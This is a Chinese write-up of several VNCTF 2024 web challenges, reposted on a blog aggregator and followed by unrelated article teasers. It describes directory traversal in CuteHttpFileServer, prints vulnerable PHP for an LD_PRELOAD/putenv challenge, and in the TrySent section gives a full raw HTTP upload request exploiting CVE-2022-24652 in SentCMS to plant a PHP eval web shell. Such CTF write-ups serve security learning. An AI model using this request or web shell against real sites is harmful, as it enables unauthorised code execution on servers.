VNCTF 2024 Web方向 WP

Checkin

题目描述:Welcome to VNCTF 2024~ long time no see.

开题,是前端小游戏

image-20240217154500289

源码里面发现一个16进制编码字符串

image-20240217154601392

解码后是flag

image-20240217154621396

CutePath

题目描述:源自一次现实渗透

开题

image-20240217154711776

当前页面没啥好看的,先爆破密码登录试试。爆破无果。。。

在项目的github仓库中的issues发现了别人提出的安全性问题(目录穿越)

安全性问题 · Issue #15 · ods-im/CuteHttpFileServer · GitHub

image-20240217182555844

确实可行,发现一个文件名为base64编码的文件。

image-20240217182622171

解码后是账号密码,即可登录。

image-20240217182714587

image-20240217182728728

目录穿越找到flag位置

image-20240217182805920

重命名,用目录穿越,将文件移到可下载目录下。

image-20240217182629547

image-20240217182841127

点开就是flag

image-20240217182900679

TrySent

考点总结:CVE-2022-24652,文件上传漏洞

题目描述:Just TrySent,出错不影响解题。

image-20240217160907617

后台管理是thinkphp的,但是工具没检测出漏洞。

image-20240217160935703

登陆后界面如下,上传头像功能值得引起注意

image-20240217162423183

这其实就是CVE-2022-24652,危险类型文件的不加限制上传,是文件上传漏洞。漏洞路由/user/upload/upload

参考文章:

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

image-20240217163203276

抓包上传文件,由于没有上传文件按钮,我们手动构建上传包。

修改包:

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

image-20240217163823624

访问呢恶意文件,getshell

image-20240217164029557

codefever_again【*】

题目描述:非常好代码,爱来自审计,codefever 最新

开题

image-20240217182941972

先注册账号试试

givenphp【*】

考点总结:LD_PRELOAD & putenv()劫持共享so绕过(LD_PRELOAD劫持(ld劫持))

题目描述:非常好题目,爱来自白给

直接给了源码:

<?php
highlight_file(__FILE__);
if(isset($_POST['upload'])){handleFileUpload($_FILES['file']);
}if(isset($_GET['challenge'])){waf();$value=$_GET['value'];$key=$_GET['key'];$func=create_function("","putenv('$key=$value');");if($func==$_GET['guess']){$func();system("whoami");}
}
function waf()
{if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){die("evil input!!!");}
}
function handleFileUpload($file)
{$uploadDirectory = '/tmp/';if ($file['error'] !== UPLOAD_ERR_OK) {echo '文件上传失败。';return;}$fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);$newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;$destination = $uploadDirectory . $newFileName;if (move_uploaded_file($file['tmp_name'], $destination)) {echo $destination;} else {echo '文件移动失败。';}
}

题目有两个功能,一个是文件上传,还有一个是环境变量修改。过滤死了不能直接环境变量注入。

有文件上传有环境变量修改就是LD_PRELOAD劫持(ld劫持)。这个方法用在disable_functions的手动绕过中,也就是LD_PRELOAD & putenv()劫持共享so绕过。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/686478.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

https 为什么安全

HTTPS&#xff08;Hypertext Transfer Protocol Secure&#xff09;是一种用于在计算机网络上安全地传输数据的通信协议。它是基于HTTP协议的扩展&#xff0c;通过使用SSL/TLS协议来加密通信内容&#xff0c;从而提供了数据的保密性和完整性&#xff0c;以及对通信双方身份的认…

Rust 初体验6

学习 Rust 的同学&#xff0c;大概都有其他语言的背景。仔细分辨与已有知识的差别&#xff0c;或有助于更好地理解Rust。以下是把 C 语言与 Rust 作一初步对比&#xff0c;以见出其中差别。 1.变量声明&#xff1a; C语言使用int、float等关键字来声明变量的类型&#xff0c;…

RESTful api-- 详解

1. 了解什么是 api 参考链接 – 本人 2. 了解 web 发展阶段 参考链接 – 本人 3. 了解什么是 REST 参考链接 – 菜鸟教程 REST 全称是 Representational State Transfer&#xff0c;中文意思是表述&#xff08;编者注&#xff1a;通常译为表征&#xff09;性状态转移。 RE…

鸿蒙应用开发工程师招聘多吗?工资有多少呢?

随着鸿蒙操作系统的快速普及&#xff0c;越来越多的企业开始重视鸿蒙应用开发人才的培养和引进。那么&#xff0c;目前市场上鸿蒙应用开发工程师招聘多吗&#xff1f;工资有多少呢&#xff1f; 首先&#xff0c;我们来了解一下鸿蒙应用开发工程师的招聘情况。随着鸿蒙操作系统…

第三百五十回

文章目录 1. 概要介绍2. 获取方法2.1 获取语言2.2 获取地址 3.示例代码3. 内容总结 我们在上一章回中介绍了"给geolocator插件提交问题"相关的内容&#xff0c;本章回中将介绍如何获取系统语言.闲话休提&#xff0c;让我们一起Talk Flutter吧。 1. 概要介绍 我们在本…

【plt.imshow显示图像】:从入门到精通,只需一篇文章!【Matplotlib】

【plt.imshow显示图像】&#xff1a;从入门到精通&#xff0c;只需一篇文章&#xff01;【Matplotlib】 &#x1f680; 利用Matplotlib进行数据可视化示例 &#x1f335;文章目录&#x1f335; &#x1f4d8; 1. plt.imshow入门&#xff1a;认识并安装Matplotlib库&#x1f308…

【数据结构】17 二叉树的建立

二叉树的建立 由于树是非线性结构&#xff0c;创建一颗二叉树必须首先确定树中结点的输入顺序&#xff0c;常用方法是先序创建和层序创建。 层序创建所用的节点输入序列是按数的从上至下从左到右的顺序形成的各层的空结点输入数值0。在构造二叉树过程中需要一个队列暂时存储各…

gitlab runner 安装、注册、配置、使用(K8S部署)

天行健&#xff0c;君子以自强不息&#xff1b;地势坤&#xff0c;君子以厚德载物。 每个人都有惰性&#xff0c;但不断学习是好好生活的根本&#xff0c;共勉&#xff01; 文章均为学习整理笔记&#xff0c;分享记录为主&#xff0c;如有错误请指正&#xff0c;共同学习进步。…

C++中获取成员函数地址的方法

C中获取成员函数地址的方法 文章目录 C中获取成员函数地址的方法[toc]前言方法1&#xff1a;通过联合体的共享储存机制方法2&#xff1a;通过汇编取成员函数偏移得到地址调用方法和测试案例 前言 ​ 这里我一共总结了两种目前可以说是最高效易用的方法来获取成员函数地址&…

深度学习主流开源框架:Caffe、TensorFlow、Pytorch、Theano、Keras、MXNet、Chainer

2.6 深度学习主流开源框架 表2.1 深度学习主流框架参数对比 框架关键词总结 框架关键词基本数据结构&#xff08;都是高维数组&#xff09;Caffe“在工业中应用较为广泛”&#xff0c;“编译安装麻烦一点”BlobTensorFlow“安装简单pip”TensorPytorch“定位&#xff1a;快…

Vue2源码梳理:vdom结构与createElement的实现

vdom 结构 浏览器原生dom对象&#xff0c;本身就是一个非常复杂的对象&#xff0c;单单把 div 这个dom对象拿出来&#xff0c;遍历它的属性&#xff0c;将是一个庞大的存在因为浏览器的标准就是把这个dom设计的非常复杂&#xff0c;所以当我们去频繁的操作dom的话&#xff0c;…

模板(个人学习笔记黑马学习)

1、函数模板 语法: template<typename T> 函数声明或定义 解释: template --- 声明创建模板 typename --- 表面其后面的符号是一种数据类型&#xff0c;可以用class代替通用的数据类型&#xff0c;名称可以替换&#xff0c;通常为大写字母 T -- 通用的数据类型&#xff0…

654. 最大二叉树

654. 最大二叉树 题目链接&#xff1a;654. 最大二叉树 代码如下&#xff1a; /*** Definition for a binary tree node.* struct TreeNode {* int val;* TreeNode *left;* TreeNode *right;* TreeNode() : val(0), left(nullptr), right(nullptr) {}* T…

探索设计模式的魅力:揭秘模版方法模式-让你的代码既灵活又可维护

设计模式专栏&#xff1a;http://t.csdnimg.cn/U54zu 目录 一、开篇二、应用场景一坨坨代码实现存在的问题 三、解决方案模式方法结构示意图及说明用模板方法模式重构示例解决的问题 四、工作原理使用模板方法模式重写示例结构图核心结构&#xff1a;抽象类和具体实现 五、总结…

【Effective Objective - C】—— 内存管理

【Effective Objective - C】—— 内存管理 前言29.理解引用计数引用计数工作原理关闭ARC模式属性存取方法中的内存管理自动释放池保留环要点 30.以ARC简化引用计数使用ARC时必须遵守的方法命名规则变量的内存管理语义ARC如何清理实例变量要点 31.在dealloc方法中只释放引用并解…

基于深度置信网络的多模态过程故障评估方法及应用

源自&#xff1a;自动化学报 作者&#xff1a;张凯, 杨朋澄, 彭开香, 陈志文 “人工智能技术与咨询” 发布 摘 要 传统的多模态过程故障等级评估方法对模态之间的共性特征考虑较少, 导致当被评估模态故障信息不充分时, 评估的准确性较低. 针对此问题, 首先, 提出一种共性–…

书生·浦语大模型实战营学习总结

书生浦语大模型实战营学习总结 实战营课程内容个人笔记汇总个人作业汇总个人大作业总结 实战营课程内容 为了推动大模型在更多行业落地开花&#xff0c;让开发者们更高效的学习大模型的开发与应用&#xff0c;上海人工智能实验室重磅推出书生浦语大模型实战营&#xff0c;为广…

Arrays工具类的常见方法总结

一、Arrays.asList( ) 1.作用&#xff1a;Arrays.asList( )方法的作用是将数组转换成List&#xff0c;将List中的全部集合对象添加至ArrayList集合中 2.参数&#xff1a;动态参数 (T... a) 3.返回值&#xff1a;List 集合 List<T> 4.举例&#xff1a; package com…

删除windows自带输入法

ctrl shift F 搜狗简繁体切换

【第二十四课】二分图:acwing-860染色法判定二分图 / acwing-861二分图的最大匹配 ( c++代码 )

目录 二分图是什么 acwing-860染色法判定二分图 染色法 代码 acwing-861二分图的最大匹配 思路 代码 二分图是什么 学习二分图的目的就是一些题目可以简化成二分图的模型来求解。 二分图也就是&#xff1a;一个无向图顶点集&#xff0c;分成了两堆顶点(可以理解为两…